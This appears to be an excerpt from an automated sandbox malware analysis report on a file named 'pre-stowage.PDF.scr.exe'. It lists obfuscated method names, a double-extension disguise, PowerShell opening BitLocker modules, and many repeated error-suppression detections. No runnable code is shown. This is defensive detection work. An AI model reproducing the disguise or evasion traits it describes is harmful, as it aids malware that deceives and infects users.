                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, As70r9koVQtCbi77sS.csHigh entropy of concatenated method names: 'imQFGVRHLd', 'S8UFmotGXR', 'JoQFdQgK4D', 'meLFQZuDf6', 'oATFwUG2Ks', 'XSuFnu9alB', 'UhjFV1Zqhn', 'OcwF4rSMEc', 'c9tFkng1wr', 'vkPFPMVtHG'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, jeEVGMbwFxUtIgFgKM.csHigh entropy of concatenated method names: 'HNNtglYej', 'K2GxRhRnt', 'XKqTNcZ5y', 'UYIjRVTeT', 'h3Yec80wk', 'RMD3NQhFa', 'fQmZRSIMAurtD5qnU5', 'tfQnoiiuNTFkjlkhpe', 'vxb6SiXPu', 'T4HymkN41'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, UJx16k4wibYGBEee69.csHigh entropy of concatenated method names: 'v8a28Oai4t', 'AOY2pxsWcU', 'OGM2WMbJmR', 'P5s2syPyYk', 'Tpv2CMeAwu', 'sbG2qKkeb2', 'Cte4LnEgIZ4qHgAfBs', 'ckTCDgMPDlTXFC8byj', 'DxL22XHZTy', 'XhR2g953n3'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, n3YbDmHT2jVUifwuLy.csHigh entropy of concatenated method names: 'orBuMl5daL', 'XPNuS9BSB0', 'rLC6YMxURk', 'mou62PcfxV', 'uWYuHgbejA', 'smFuX1BbQS', 'jXKuILWL8x', 'S2uuLNZHf1', 'YNjuAVcfO5', 'CxjuixpLDb'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, opJUIm9UcyxBl5Yai1.csHigh entropy of concatenated method names: 'n6vCPdrNtE', 'UBSCXwOUGH', 'iHjCLRVrQB', 'JsxCAjPIOM', 'AZpCmPqph3', 'wlMCdwI850', 'xSGCQgPDLC', 'ijLCwusquh', 'N3hCnZRZvC', 't1MCV2bdaU'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, JAiuoQWeZCVY5sQiOM.csHigh entropy of concatenated method names: 'V7BFCy1q7s', 'o00FuyFfWH', 'tC9FFvqbdu', 'K2TF9STASS', 'EpiFautIJ4', 'qEwF7QlfYT', 'Dispose', 'iEK6Ky8AWs', 'M2v607gTWu', 'OTx6fRqZd2'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, ypTk0VpAB3YFXV3wNl.csHigh entropy of concatenated method names: 'dDnMKq2F9c12JC8T0H4', 'OQuqW42TlDgr76I1w7W', 'h6oN6fYZUW', 'mYkNFseUwu', 'r62NyZLBF6', 'WKIvPG2cDhj5qqA333o', 'af5nwZ2neOXIpAGKOxu'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, PmXsTUCDOgkMU8yksJ.csHigh entropy of concatenated method names: 'dOxNoUgvBn', 'NhoN0KXtpJ', 'P03NbBBUb9', 'PDQN8yuuDh', 'sPpNpYRaKe', 'hcBbEgIxYJ', 'wHCbvkBtN8', 'CrxbOnqYLq', 'v9kbMI1xaT', 'a6Zb5dekui'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, BEMj65tVslqGPIwBnf.csHigh entropy of concatenated method names: 'Dispose', 'F6Q25yDtoD', 'r0SJm3XaHn', 'KWhREHlU2U', 'ldb2SMIMlS', 'R4O2zHiWl8', 'ProcessDialogKey', 's9kJYc6R5Z', 'wwGJ2ftsj1', 'r5kJJ91WZW'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, UfFTqgYtsb6KTX3coT.csHigh entropy of concatenated method names: 'cIp0L354ZI', 'X0D0ASEdAj', 'TH80iqroyB', 'lqu0Ux5S3H', 'P4h0EWBnad', 'LIf0vAHAL7', 'BuD0OiDtrr', 'PlW0MAaWDr', 'wvY05xdchd', 'krm0SPEGZt'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, xb8rqfNfAIUnuW0mCg.csHigh entropy of concatenated method names: 'OyylrpNiaG', 'fEjleZi9Z0', 'lVNlGq0bSK', 'SJalmZXufJ', 'auJlQc4eU8', 'v56lwHjmE2', 'nIFlVyAI4C', 'b31l4bpA6A', 'uU8lP8tHU4', 'EZflHMVCSG'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.csHigh entropy of concatenated method names: 'RCxgoRSXgy', 'NolgKc0dv3', 'Xkbg0jT5v8', 'vKUgfCnZX3', 'Ws8gbFUryx', 'TNWgNhRrPc', 'm0Vg8WGcQy', 'RBcgpsnTqK', 'gP7gZ8gdWp', 'S97gWfOefD'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, QDGTI6wugRXuhhDQD6D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'POIyHhlZBW', 'TOuyXsyanY', 'ef0yIsgTtY', 'GfYyLFr1pH', 'fq2yAjpntc', 'llAyi8ed0c', 'iLfyUqqjxg'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, bCZYANwwpQ2r7u6mgpB.csHigh entropy of concatenated method names: 'dPQyS7xXOo', 'GHpyzoMBeG', 'nW49YncIbO', 't0192jUNTQ', 'ObR9JTpSuh', 'RaG9gqrAKJ', 'a7N9cb6dyo', 'apc9oNokWF', 'QGu9KAyfxq', 'BlB90AXKti'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, VLsxuBhnuaR0lNrC6k.csHigh entropy of concatenated method names: 'ToString', 'j0pqH3VvGt', 'Y77qmGH1Po', 'W3rqdefa8O', 'eR8qQux2Nx', 'VshqwTtWa6', 'xi3qndt99E', 'jWhqVuZssA', 'HYcq4XbgbQ', 'pVqqkE2QoX'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, lOJAEsscuiBpdmc6iC.csHigh entropy of concatenated method names: 'cxZyfCU65h', 'fMBybCJRPT', 'DGqyN6tEMC', 'ejry8nvcfv', 'oFJyFHwfnG', 'ebOypnqSjC', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, OFjZs8w4IE7cY9fQFJk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oUrRFVk2t3', 'Ql8Ryw8GDW', 'x09R96nPrI', 'TqQRRieYgJ', 'YyeRaVNGGv', 'AFmRBQEwxP', 'lGYR7VMq7U'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, r5YwhfVYKOBjaNYsWF.csHigh entropy of concatenated method names: 'qv981D533I', 'JeD8hhyDE4', 'z1m8to2tNV', 'yJK8xQZoNl', 'O8j8DseaSN', 'ebh8ThcGCw', 'mYd8jVLGwI', 'UYh8rvD79K', 'DZq8eacTBB', 'VAR83DZ6d5'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, BW1XoG8aG2SQRRV2vI.csHigh entropy of concatenated method names: 'cAKuWXbHWE', 'nUgusq84th', 'ToString', 'faBuKkpvEW', 'B5Fu0yShrc', 'iJxufQFwED', 'F6WubTc3FB', 'aIQuNF2I8s', 'b89u8C3h2r', 'aLpupNVbwJ'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, KpCbpn3nRoLFMRTXIK.csHigh entropy of concatenated method names: 'ip6fx90Bqf', 'lkJfT3X34j', 'MrgfrY3Vyd', 'pqcferWTH1', 'BVtfCkpuPr', 'N68fqlCKjE', 'crefu3lnwi', 'MOCf6bKJ9Q', 'UGAfF4rZjC', 'EPkfy0DSVJ'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, As70r9koVQtCbi77sS.csHigh entropy of concatenated method names: 'imQFGVRHLd', 'S8UFmotGXR', 'JoQFdQgK4D', 'meLFQZuDf6', 'oATFwUG2Ks', 'XSuFnu9alB', 'UhjFV1Zqhn', 'OcwF4rSMEc', 'c9tFkng1wr', 'vkPFPMVtHG'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: Possible double extension: pdf.scrStatic PE information: pre-stowage.PDF.scr.exe
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
